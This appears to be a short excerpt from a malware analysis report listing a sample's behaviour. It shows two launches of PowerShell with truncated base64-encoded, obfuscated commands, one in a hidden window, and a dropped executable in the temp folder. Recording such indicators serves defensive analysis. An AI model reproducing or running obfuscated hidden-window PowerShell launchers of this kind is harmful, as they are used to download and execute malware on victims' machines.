Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAF8AdQA0ADcAdwBkAD0AJwBRAHUAYwB1AGIAegA4ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAEMAdQBSAGAAaQBUAHkAUABSAE8AdABgAE8AQwBPAEwAIgAgAD0AIAAnAH...
- %TEMP%\qzra.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABCAF8AdQA0ADcAdwBkAD0AJwBRAHUAYwB1AGIAegA4ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAEMAdQBSAGAAaQBUAHkAUABSAE8AdABgAE8AQwBPAEwAIgAgAD0AIAAnAH...' (with hidden window)